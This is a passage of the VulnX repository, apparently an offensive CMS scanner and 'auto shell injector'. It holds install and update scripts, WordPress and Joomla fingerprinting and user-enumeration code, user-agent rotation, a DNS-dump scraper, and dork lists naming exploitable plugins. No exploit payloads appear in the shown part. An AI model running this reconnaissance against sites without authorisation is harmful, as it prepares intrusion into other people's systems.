= "\e[0;32m" 3 | off = "\e[0m" 4 | function banner(){ 5 | echo -e "===== VULNX INSTALL =====" 6 | } 7 | function termuxOS() { 8 | echo -e "$red [$green+$red]$Cleaning Up Old Directories ..."; 9 | rm -r "/data/data/com.termux/files/usr/share/vulnx" 10 | echo -e "$red [$green+$red]$off Installing ..."; 11 | git clone https://github.com/anouarbensaad/vulnx "/data/data/com.termux/files/usr/share/vulnx"; 12 | rm -r "/data/data/com.termux/files/usr/share/vulnx/config" 13 | if [[ -d "/data/data/com.termux/files/usr/share/vulnx" ]]; then 14 | echo -e "$red [$green+$red]$off Tool Successfully Updated And Will Start In 5s!"; 15 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 16 | sleep 5; 17 | vulnx 18 | else 19 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 20 | exit 21 | fi 22 | } 23 | 24 | function debianOS() { 25 | echo -e "$red [$green+$red]$off Cleaning Up Old Directories ..."; 26 | sudo rm -r "/usr/share/vulnx" 27 | echo -e "$red [$green+$red]$off Installing ..."; 28 | sudo git clone https://github.com/anouarbensaad/vulnx "/usr/share/vulnx"; 29 | sudo rm -r "/usr/share/vulnx/config" 30 | if [[ -d "/usr/share/vulnx" ]]; then 31 | echo -e "$red [$green+$red]$off Tool Successfully Updated And Will Start In 5s!"; 32 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx"; 33 | sleep 5; 34 | vulnx 35 | else 36 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 37 | exit 38 | fi 39 | } 40 | if [[ -d "/data/data/com.termux/files/usr/" ]]; then 41 | banner 42 | echo -e "$red [$green+$red]$off vulnx Will Be Installed In Your System"; 43 | termuxOS 44 | elif [ -d "/usr/bin/" ];then 45 | banner 46 | echo -e "$red [$green+$red]$off vulnx Will Be Installed In Your System"; 47 | debianOS 48 | fi 49 | -------------------------------------------------------------------------------- /modules/gathering/joocms.py: -------------------------------------------------------------------------------- 1 | """ Joomla Information Gathering """ 2 | from common.colors import red, green, bg, G, R, W, Y, G, good, bad, run, info, end, que 3 | import re 4 | import requests 5 | # Find Joomla version and check it on exploit-db 6 | 7 | 8 | def joo_version(url, headers): 9 | endpoint = url + "/administrator/manifests/files" + '/joomla.xml' 10 | response = requests.get(endpoint, headers).text 11 | regex = r'(.+?)' 12 | pattern = re.compile(regex) 13 | version = re.findall(pattern, response) 14 | if version: 15 | return print(' %s Version : %s' % (good, version[0])) 16 | 17 | 18 | def joo_user(url, headers): 19 | users = [] 20 | endpoint = url + '/?format=feed' 21 | response = requests.get(endpoint, headers).text 22 | regex = r'(.+?) \((.+?)\)' 23 | pattern = re.compile(regex) 24 | joouser = re.findall(pattern, response) 25 | if joouser: 26 | joouser = sorted(set(joouser)) 27 | for user in joouser: 28 | users.append(user[1]) 29 | msg = user[1] + ": " + user[0] 30 | print(msg) 31 | 32 | 33 | def joo_template(url, headers): 34 | main_endpoint = url + '/index.php' 35 | responsea = requests.get(main_endpoint, headers).text 36 | WebTemplates = re.findall("/templates/(.+?)/", responsea) 37 | WebTemplates = sorted(set(WebTemplates)) 38 | adm_endpoint = url + '/administrator/index.php' 39 | responseb = requests.get(adm_endpoint, headers).text 40 | AdminTemplates = re.findall("/administrator/templates/(.+?)/", responseb) 41 | AdminTemplates = sorted(set(AdminTemplates)) 42 | if WebTemplates: 43 | for WebTemplate in WebTemplates: 44 | return print(' %s WebTemplate : %s' % (good, WebTemplate[0])) 45 | if AdminTemplates: 46 | for AdminTemplate in AdminTemplates: 47 | return print(' %s AdminTemplate : %s' % (good, AdminTemplate[0])) 48 | -------------------------------------------------------------------------------- /modules/gathering/wpcms.py: -------------------------------------------------------------------------------- 1 | """ WordPress Information Gathering """ 2 | import re 3 | import requests 4 | from common.colors import B, W, G, good, bad,run 5 | 6 | # searching for the wordpress version 7 | 8 | 9 | def wp_version(url, headers): 10 | ep = url 11 | getversion = requests.get(ep, headers).text 12 | # searching version content from the http response. \d{:digit} version form 0.0.0 13 | matches = re.search(re.compile( 14 | r'content=\"WordPress (\d{0,9}.\d{0,9}.\d{0,9})?\"'), getversion) 15 | if matches: 16 | version = matches.group(1) 17 | return print(' %s Version : %s' % (good, version)) 18 | # searching for the wordpress themes 19 | 20 | def wp_themes(url, headers): 21 | ep = url 22 | themes_array = [] 23 | getthemes = requests.get(ep, headers).text 24 | matches = re.findall(re.compile(r'themes/(\w+)?/'), getthemes) 25 | # loop for matching themes.) 26 | if len(matches) > 0: 27 | for theme in matches: 28 | if theme not in themes_array: 29 | themes_array.append(theme) 30 | for i in range(len(themes_array)): 31 | print(' %s Themes : %s ' % (good, themes_array[i])) 32 | # searching for the wordpress user 33 | 34 | 35 | def wp_user(url, headers): 36 | ep = url + '/?author=1' 37 | getuser = requests.get(ep, headers).text 38 | matches = re.search(re.compile(r'author/(\w+)?/'), getuser) 39 | if matches: 40 | user = matches.group(1) 41 | return print(' %s User : %s' % (good, user)) 42 | 43 | # searching for the wordpress plugins 44 | 45 | 46 | def wp_plugin(url, headers): 47 | plugins_array = [] 48 | ep = url 49 | getplugin = requests.get(ep, headers).text 50 | matches = re.findall(re.compile(r'wp-content/plugins/(\w+)?/'), getplugin) 51 | if len(matches) > 0: 52 | for plugin in matches: 53 | if plugin not in plugins_array: 54 | plugins_array.append(plugin) 55 | for i in range(len(plugins_array)): 56 | print(' %s Plugins : %s ' % (good, plugins_array[i])) -------------------------------------------------------------------------------- /docker/debian_stretch/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:stretch-slim 2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com 3 | 4 | # Project Informations. 5 | LABEL name vulnx 6 | LABEL src "https://github.com/anouarbensaad/vulnx" 7 | LABEL creator anouarbensaad 8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\ 9 | fast cms detection of target and fast scanner and informations gathering like\ 10 | subdomains, \ 11 | ipaddresses,\ 12 | country, \ 13 | org, \ 14 | timezone, \ 15 | region, \ 16 | ans \ 17 | and more ...\ 18 | Instead of injecting shell and checking it works like all the other tools do,\ 19 | vulnx analyses the response with and recieve if shell success uploaded or no.\ 20 | vulnx is searching for urls with dorks." 21 | 22 | # Install Git, 23 | RUN apt-get update -qq && \ 24 | apt-get install -qq -y --no-install-recommends --no-install-suggests && \ 25 | git && \ 26 | rm -rf /var/lib/apt/lists/* && \ 27 | apt-get clean && \ 28 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/* 29 | 30 | # Make Vulnx Directory & Clonning Vulnx From Github 31 | RUN mkdir -p /usr/share/vulnx && cd usr/share/vulnx && \ 32 | git clone https://www.github.com/anouarbensaad/vulnx 33 | 34 | # Make vulnx group 35 | RUN addgroup vulnx 36 | 37 | # added \\vulnx [group] secondary group to vulnx. 38 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx 39 | 40 | # change vulnx owner of directory of project. 41 | RUN chown -R vulnx vulnx 42 | 43 | # Switch user. 44 | USER vulnx 45 | 46 | # Working−Directory 47 | WORKDIR vulnx 48 | 49 | # Install Python3 & Pip 3 50 | RUN apt-get update -qq && \ 51 | apt-get install -qq -y --no-install-recommends \ 52 | python3 \ 53 | python3-pip && \ 54 | rm -rf /var/lib/apt/lists/* && \ 55 | apt-get clean && \ 56 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/* 57 | 58 | # Install Pip Packages. 59 | RUN pip3 install requests && \ 60 | pip3 install bs4 61 | 62 | # Add Mount Volume Docker To Save All changes. 63 | VOLUME [ "/vulnx" ] 64 | 65 | #run container with it mode & run python3 vulnx.py -u ... 66 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | #### v2.0 2 | - Add Module to get the operating system of target and web server name & version. 3 | #### v1.9 4 | - Add Vulnx−Mode `interactive mode` 5 | - Add Command Line Interface Class `cli` 6 | - Add Dork Functionnality to Vulnx−Mode 7 | - Fix DNSDUMP Functionnality 8 | 9 | #### v1.8 10 | - Remove pip & rename conf to config to excute update without problem. 11 | - Fix port arg to give port to scan. 12 | - CI : Change pip package. 13 | - Docker : change pip package. 14 | - Remove the ENV Variable. 15 | 16 | #### v1.7 17 | - add documentation vulnx for windows. 18 | - add minor changes in dockerfile. 19 | - add documentation for developper used vulnx library 20 | - fix regEx in prestashop version. 21 | - error handling and ignore warnings. 22 | 23 | #### v1.6 24 | - Added Payloads. 25 | - Added PS Exploits 26 | - Added Joomla Exploits 27 | - Fix Issues 28 | - Added Dorks Output {logs} 29 | - Scan Multiple targets. 30 | - Docker Using User. {`Fix Permissions`} 31 | - Fix .travis {`CI`: Run tests after merge or pull requests} 32 | - Listing Dorks {list `ps` , `joo` , `wp` , `dru`} exploits manually 33 | 34 | #### v1.5 35 | - Added 8 Prestashop Exploits. 36 | - Added `Windows` & `MacOS` Comptability 37 | - Fixed a few bugs 38 | - Added vulnx to Docker from Ubuntu Image. 39 | 40 | #### v1.4 41 | - Fix parsing url 42 | - Fix Robot Detected when you searching for dorks. 43 | - Deserialize `json` data from dnsdumpster 44 | - Added `Bot` Automate Scan 45 | - Fix Modules Name 46 | - Exports `Dorks` Search into file 47 | 48 | #### v1.3 49 | - Added vulnx to `PyPi` 50 | - Added a `ports` scanner **plugin**. 51 | - Improve `dorks` google searching. 52 | - Added `termux` compatibility & fix pip package. 53 | 54 | #### v1.2 55 | - Use of `ThreadPoolExecutor` for more speed 56 | - Added pip packages. 57 | - Added `travis.yml` continuous integration 58 | - Added shields to README.MD 59 | 60 | #### v1.1 61 | - Added `--timeout` , `--exploits` , `--cms-info` , `--domains-info` , options 62 | - Added `Dorks` list 63 | - Fixed `Dork Search` 64 | - Added `wordpress`, `joomla` ,`prestashop`, `drupal` , `lokomedia` , `magento` , `opencart` CMS DETECT. 65 | - Disabled `SSL` Warning 66 | - Added `WP-Exploits` 67 | - Fixed `Dockerfile` 68 | -------------------------------------------------------------------------------- /common/banner.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from common.colors import bannerblue, bannerblue2, W, Y, R, end 3 | 4 | 5 | def banner(): 6 | print("""%s 7 | 8 | .:. .:, 9 | xM; XK. 10 | dx' .lO. 11 | do ,0. 12 | .c.lN' , '. .k0.:' 13 | xMMk;d;''cOM0kWXl,',locMMX. 14 | .NMK. :WMMMMMMMx dMMc 15 | lMMO lWMMMMMMMMMO. lMMO 16 | cWMxxMMMMMMMMMMMMKlWMk 17 | .xWMMMMMMMMMMMMMMM0,%s 18 | .,OMd,,,;0MMMO,. 19 | .l0O.%sVXVX%sOX.%sVXVX%s0MO%sVXVX%s.0Kd, 20 | lWMMO0%sVXVX0%sOX.%sVXVX%sl%sVXVX%s.VXNMMO 21 | .MMX;.N0%sVXVX0%s0X.%sVXVXVX0%s.0M:.OMMl 22 | .OXc ,MMO%sVXVX0%sVX%s .VXVX0%s0MMo ,0X' 23 | 0x. :XMMMk%sVXVX.%sXO.%sVXVX%sdMMMWo. :X' 24 | .d 'NMMMMMMk%sVXVX%s..%sVXVX0%s.XMMMMWl ;c 25 | 'NNoMMMMMMx%sVXVXVXVXVX0.%sXMMk0Mc 26 | .NMx OMMMMMMd%sVXVXVX%sl%sVXVX%s.NW.;MMc 27 | :NMMd .NMMMMMMd%sVXVX%sdMd,,,,oc ;MMWx 28 | .0MN, 'XMMMMMMo%sVX%soMMMMMMWl 0MW, 29 | .0. .xWMMMMM:lMMMMMM0, kc 30 | ,O. .:dOKXXXNKOxc. do 31 | '0c -VulnX- ,Ol 32 | ;. :. 33 | 34 | %s# Coded By Anouar Ben Saad -%s @anouarbensaad 35 | %s""" 36 | % 37 | (bannerblue, bannerblue2, 38 | W, bannerblue2, W, bannerblue2, W, bannerblue2, 39 | W, bannerblue2, W, bannerblue2, W, bannerblue2, 40 | W, bannerblue2, W, bannerblue2, 41 | W, bannerblue2, W, bannerblue2, 42 | W, bannerblue2, W, bannerblue2, 43 | W, bannerblue2, W, bannerblue2, 44 | W, bannerblue2, 45 | W, bannerblue2, W, bannerblue2, 46 | W, bannerblue2, 47 | W, bannerblue2, 48 | W, Y, end 49 | )) 50 | -------------------------------------------------------------------------------- /modules/gathering/host_gathering.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import socket 4 | from common.colors import bad,que, info, good,run,W,end 5 | from common.uriParser import parsing_url as hostd 6 | 7 | class GatherHost(): 8 | 9 | def __init__(self,url,headers=None): 10 | self.url = url 11 | self.headers = headers 12 | 13 | def match_info(self,regex,data): 14 | 15 | match = re.search(regex, data) 16 | if match: 17 | return dict( 18 | data=match.group(1) 19 | ) 20 | 21 | def match_printer(self,to_match,match): 22 | if match['data']: 23 | print(' {0} {1} : {2}'.format(good,to_match,match['data'])) 24 | 25 | def os_server(self): 26 | 27 | response = requests.get(self.url, headers=self.headers,verify=False).headers 28 | try: 29 | regx = re.compile(r"(.+) \((.+)\)") 30 | data = regx.search(response["server"]) 31 | try: 32 | print(' {0} {1}Server :{2} {3}' .format(good, W, end, data.group(1))) 33 | print(' {0} {1}OS :{2} {3}' .format(good, W, end, data.group(2))) 34 | except AttributeError: 35 | print(' {0} Cannot Find OS & HostingServer ' .format(bad)) 36 | except KeyError: 37 | print(' {0} Cannot Find the server headers ' .format(bad)) 38 | 39 | def web_host(self): 40 | urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(self.url) 41 | getinfo = requests.get(urldate, self.headers,verify=False).text 42 | regex_date = r'Date: (.+?)-(.+?)' 43 | regex_date = re.compile(regex_date) 44 | matches = re.search(regex_date, getinfo) 45 | try: 46 | if matches: 47 | print(' {0} Domain Created on : {1}'.format(good, matches.group(1))) 48 | ip = socket.gethostbyname(hostd(self.url)) 49 | print(' {0} CloudFlare IP : {1}'.format(good, ip)) 50 | ipinfo = "http://ipinfo.io/" + ip + "/json" 51 | gather = requests.get(ipinfo, self.headers).text 52 | 53 | self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather)) 54 | self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather)) 55 | self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather)) 56 | self.match_printer('Postal',self.match_info(r'postal\": \"(.+?)\"',gather)) 57 | self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather)) 58 | self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather)) 59 | except Exception as err: 60 | print(' {0} Parse Error : {1}' .format(bad,err)) -------------------------------------------------------------------------------- /common/requestUp.py: -------------------------------------------------------------------------------- 1 | 2 | import random 3 | import requests 4 | from requests.exceptions import TooManyRedirects 5 | from common.uriParser import parsing_url as hostd 6 | 7 | SESSION = requests.Session() 8 | SESSION.max_redirects = 2 9 | 10 | 11 | def random_UserAgent(): 12 | useragents_rotate = [ 13 | "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]", 14 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)", 15 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", 16 | "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)", 17 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", 18 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9", 19 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246", 20 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)", 21 | "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1", 22 | "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1", 23 | "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02", 24 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36", 25 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", 26 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0", 27 | "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36", 28 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1", 29 | "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8", 30 | "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01" 31 | ] 32 | useragents_random = random.choice(useragents_rotate) 33 | return useragents_random 34 | 35 | 36 | def getrequest( 37 | url, 38 | headers, 39 | timeout=3, 40 | ): 41 | """GetRequest without ssl verification""" 42 | headers = set() 43 | 44 | def get(url): 45 | # Selecting a random user-agent 46 | response = SESSION.get( 47 | url, 48 | headers=headers, 49 | verify=False, 50 | timeout=timeout, 51 | stream=True, 52 | ) 53 | return response.text 54 | return get(url) 55 | 56 | 57 | def sendrequest( 58 | url, 59 | headers=None, 60 | data=None, 61 | timeout=3, 62 | ): 63 | """GetRequest without ssl verification""" 64 | headers = set() 65 | data = set() 66 | 67 | def post(url): 68 | response = SESSION.post( 69 | url, 70 | data=data, 71 | headers=headers, 72 | verify=False, 73 | timeout=timeout, 74 | stream=True, 75 | ) 76 | return response.text 77 | return post(url) 78 | -------------------------------------------------------------------------------- /modules/dorks/helpers.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from common.colors import run, W, end, good, bad, que, info, bannerblue 7 | 8 | class DorkManual(): 9 | 10 | def __init__(self,select=None): 11 | self.select = select 12 | 13 | def dorkslist(self): 14 | print(""" 15 | −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 16 | %sWordPress Joomla Prestashop 17 | −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−%s 18 | blaze comjce columnadverts 19 | catpro comfabrik soopabanners 20 | cherry comjdownloads vtslide 21 | dm comfoxcontact simpleslideshow 22 | fromcraft productpageadverts 23 | synoptic productpageadvertsb 24 | shop jro_homepageadvertise 25 | revslider attributewizardpro 26 | adsmanager oneattributewizardpro 27 | inboundiomarketing attributewizardpro_old 28 | wysija attributewizardpro_x 29 | powerzoomer advancedslider 30 | showbiz cartabandonmentpro 31 | jobmanager cartabandonmentpro_old 32 | injection videostab 33 | thumbslider wg24themeadministration 34 | fieldvmegamenu 35 | wdoptionpanel 36 | pk_flexmenu 37 | pk_vertflexmenu 38 | nvn_export_orders 39 | tdpsthemeoptionpanel 40 | masseditproduct 41 | """ % (W, end)) 42 | 43 | def wp_dorkTable(self): 44 | print(""" 45 | WordPress 46 | --------- 47 | blaze 48 | catpro 49 | cherry 50 | dm 51 | fromcraft 52 | synoptic 53 | shop 54 | revslider 55 | adsmanager 56 | inboundiomarketing 57 | wysija 58 | powerzoomer 59 | showbiz 60 | jobmanager 61 | injection 62 | thumbslider 63 | """) 64 | 65 | def joo_dorkTable(self): 66 | print(""" 67 | Joomla 68 | ------ 69 | comjce 70 | comfabrik 71 | comjdownloads 72 | comfoxcontact 73 | """) 74 | 75 | def ps_dorkTable(self): 76 | 77 | print(""" 78 | Prestashop 79 | ----------- 80 | columnadverts 81 | soopabanners 82 | vtslide 83 | simpleslideshow 84 | productpageadverts 85 | productpageadvertsb 86 | jro_homepageadvertise 87 | attributewizardpro 88 | oneattributewizardpro 89 | attributewizardpro_old 90 | attributewizardpro_x 91 | advancedslider 92 | cartabandonmentpro 93 | cartabandonmentpro_old 94 | videostab 95 | wg24themeadministration 96 | fieldvmegamenu 97 | wdoptionpanel 98 | pk_flexmenu 99 | pk_vertflexmenu 100 | nvn_export_orders 101 | tdpsthemeoptionpanel 102 | masseditproduct 103 | """) 104 | 105 | def loko_dorkTable(self): 106 | print(""" 107 | Lokomedia 108 | ------ 109 | """) 110 | 111 | def dru_dorkTable(self): 112 | print(""" 113 | Drupal 114 | ------ 115 | """) 116 | 117 | def list(self): 118 | if self.select == 'all': 119 | self.dorkslist() 120 | 121 | if self.select == 'wordpress': 122 | self.wp_dorkTable() 123 | 124 | if self.select == 'joomla': 125 | self.joo_dorkTable() 126 | 127 | if self.select == 'prestashop': 128 | self.ps_dorkTable() 129 | 130 | if self.select == 'Lokomedia': 131 | self.loko_dorkTable() 132 | 133 | if self.select == 'Drupal': 134 | self.dru_dorkTable() 135 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | red="\e[0;31m" 4 | blue="\e[0;94m" 5 | green="\e[0;32m" 6 | off="\e[0m" 7 | 8 | #vulnx install function for Android. termux 9 | function banner(){ 10 | echo -e "===== VULNX INSTALL =====" 11 | } 12 | 13 | function termuxOS() { 14 | echo -e "$red [$green+$red]$off Installing Python ..."; 15 | pkg install python 16 | echo -e "$red [$green+$red]$off Installing Packages ..."; 17 | pip install -r ./requirements.txt 18 | echo -e "$red [$green+$red]$off Checking directories ..." 19 | if [ -e "/data/data/com.termux/files/usr/share/vulnx" ]; then 20 | echo -e "$red [$green+$red]$off A previous installation was found Do you want to replace it? [Y/n]: " 21 | read replace 22 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then 23 | rm -r "/data/data/com.termux/files/usr/share/vulnx" 24 | rm "/data/data/com.termux/files/usr/bin/vulnx" 25 | else 26 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations"; 27 | echo -e "$red [$green✘$red]$off Installation Failed"; 28 | exit 29 | fi 30 | fi 31 | echo -e "$red [$green+$red]$off Installing ..."; 32 | mkdir "/data/data/com.termux/files/usr/share/vulnx" 33 | cp "vulnx.py" "/data/data/com.termux/files/usr/share/vulnx" 34 | cp "install.sh" "/data/data/com.termux/files/usr/share/vulnx" 35 | cp "update.sh" "/data/data/com.termux/files/usr/share/vulnx" 36 | cp -r "./common" "/data/data/com.termux/files/usr/share/vulnx" 37 | cp -r "./modules" "/data/data/com.termux/files/usr/share/vulnx" 38 | cp -r "./shell" "/data/data/com.termux/files/usr/share/vulnx" 39 | chmod +x /data/data/com.termux/files/usr/share/vulnx/update.sh 40 | echo -e "$red [$green+$red]$off Creating Symbolic Link ..."; 41 | echo "#!/data/data/com.termux/files/usr/bin/bash 42 | python /data/data/com.termux/files/usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx"; 43 | cp "vulnx" "/data/data/com.termux/files/usr/bin" 44 | chmod +x "/data/data/com.termux/files/usr/bin/vulnx" 45 | rm "vulnx"; 46 | if [ -d "/data/data/com.termux/files/usr/share/vulnx" ] ; 47 | then 48 | echo -e "$red [$green+$red]$off Tool successfully installed and will start in 5s!"; 49 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 50 | sleep 5; 51 | vulnx 52 | else 53 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 54 | exit 55 | fi 56 | } 57 | 58 | #vulnx install function for debian operating system. linux. 59 | function debianOS(){ 60 | echo -e "$red [$green+$red]$off Installing python3... "; 61 | sudo apt-get install -y python3 62 | pip install -r ./requirements.txt 63 | echo -e "$red [$green+$red]$off Checking directories... " 64 | if [ -d "/usr/share/VulnX" ]; then 65 | echo -e "$red [$green+$red]$off A Directory VulnX Was Found! Do You Want To Replace It? [Y/n]:" ; 66 | read replace 67 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then 68 | sudo rm -r "/usr/share/vulnx" 69 | sudo rm "/usr/share/icons/vulnxicon.png" 70 | sudo rm "/usr/share/applications/vulnx.desktop" 71 | sudo rm "/usr/local/bin/vulnx" 72 | else 73 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations"; 74 | echo -e "$red [$green✘$red]$off Installation Failed"; 75 | exit 76 | fi 77 | fi 78 | echo -e "$red [$green+$red]$off Installing ..."; 79 | echo -e "$red [$green+$red]$off Creating Symbolic Link ..."; 80 | echo -e "#!/bin/bash 81 | python3 /usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx"; 82 | chmod +x "vulnx"; 83 | if [[ ! -d "/usr/share/vulnx" ]];then 84 | sudo mkdir "/usr/share/vulnx" 85 | fi 86 | sudo cp "install.sh" "/usr/share/vulnx" 87 | sudo cp "update.sh" "/usr/share/vulnx" 88 | sudo cp -r "./common" "/usr/share/vulnx/" 89 | sudo cp -r "./modules" "/usr/share/vulnx/" 90 | sudo cp -r "./shell" "/usr/share/vulnx/" 91 | sudo chmod +x /usr/share/vulnx/update.sh 92 | sudo cp "vulnx.py" "/usr/share/vulnx" 93 | sudo cp "bin/vulnxicon.png" "/usr/share/icons" 94 | sudo cp "bin/vulnx.desktop" "/usr/share/applications" 95 | sudo cp "vulnx" "/usr/local/bin/" 96 | rm "vulnx"; 97 | if [ -d "/usr/share/vulnx" ] ; 98 | then 99 | echo -e "$red [$green+$red]$off Tool Successfully Installed And Will Start In 5s!"; 100 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 101 | sleep 5; 102 | vulnx 103 | else 104 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 105 | exit 106 | fi 107 | } 108 | #main 109 | if [[ $UID -eq 0 ]]; then 110 | if [ -d "/data/data/com.termux/files/usr/" ]; then 111 | banner 112 | echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System"; 113 | termuxOS 114 | elif [ -d "/usr/bin/" ];then 115 | banner 116 | echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System"; 117 | debianOS 118 | else 119 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 120 | exit 121 | fi 122 | else 123 | echo "You must run as root..." 124 | fi -------------------------------------------------------------------------------- /modules/dns_dump.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | #!/usr/bin/env python 4 | 5 | from __future__ import (absolute_import, division, print_function) 6 | 7 | import requests 8 | import re 9 | import base64 10 | import json 11 | from common.colors import red, green, bg, G, R, W, Y, G, good, bad, run, info, end, que, bannerblue 12 | from bs4 import BeautifulSoup 13 | from common.uriParser import parsing_url as hostd 14 | 15 | 16 | def results(table): 17 | res = [] 18 | trs = table.findAll('tr') 19 | for tr in trs: 20 | tds = tr.findAll('td') 21 | pattern_ip = r'([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})' 22 | try: 23 | ip = re.findall(pattern_ip, tds[1].text)[0] 24 | domain = str(tds[0]).split('
')[0].split('>')[1] 25 | header = ' '.join(tds[0].text.replace('\n', '').split(' ')[1:]) 26 | reverse_dns = tds[1].find('span', attrs={}).text 27 | 28 | additional_info = tds[2].text 29 | country = tds[2].find('span', attrs={}).text 30 | autonomous_system = additional_info.split(' ')[0] 31 | provider = ' '.join(additional_info.split(' ')[1:]) 32 | provider = provider.replace(country, '') 33 | data = {'domain': domain, 34 | 'ip': ip, 35 | 'reverse_dns': reverse_dns, 36 | 'as': autonomous_system, 37 | 'provider': provider, 38 | 'country': country, 39 | 'header': header} 40 | res.append(data) 41 | except: 42 | pass 43 | return res 44 | 45 | 46 | def text_record(table): 47 | res = [] 48 | for td in table.findAll('td'): 49 | res.append(td.text) 50 | return res 51 | 52 | 53 | def dnsdumper(url): 54 | 55 | ''' 56 | For DNS Dump you retrieve token from dnsdumpster. 57 | V T X 58 | | / | / 59 | | / | / 60 | U -> N 61 | | / Parsing data from records 62 | | / MX , Domains , DNS , MAILS 63 | L 64 | Schema V, returns set of (U, L, N, T, X) 65 | ''' 66 | 67 | domain = hostd(url) 68 | dnsdumpster_url = 'https://dnsdumpster.com/' 69 | response = requests.Session().get(dnsdumpster_url) 70 | soup = BeautifulSoup(response.text, 'html.parser') 71 | # If no match is found, the return object won't have group method, so check. 72 | try: 73 | csrf_token = soup.findAll( 74 | 'input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value'] 75 | except AttributeError: # No match is found 76 | csrf_token = soup.findAll( 77 | 'input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value'] 78 | print(' %s Retrieved token: %s' % (info, csrf_token)) 79 | cookies = {'csrftoken': csrf_token} 80 | headers = {'Referer': 'https://dnsdumpster.com/'} 81 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain, 'user': 'free'} 82 | response = requests.Session().post('https://dnsdumpster.com/', 83 | cookies=cookies, data=data, headers=headers) 84 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain) 85 | if response.status_code == 200: 86 | soup = BeautifulSoup(response.content, 'html.parser') 87 | tables = soup.findAll('table') 88 | res = {} 89 | res['domain'] = domain 90 | res['dns_records'] = {} 91 | res['dns_records']['dns'] = results(tables[0]) 92 | res['dns_records']['mx'] = results(tables[1]) 93 | print(' %s Search for DNS Servers' % que) 94 | for entry in res['dns_records']['dns']: 95 | print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n 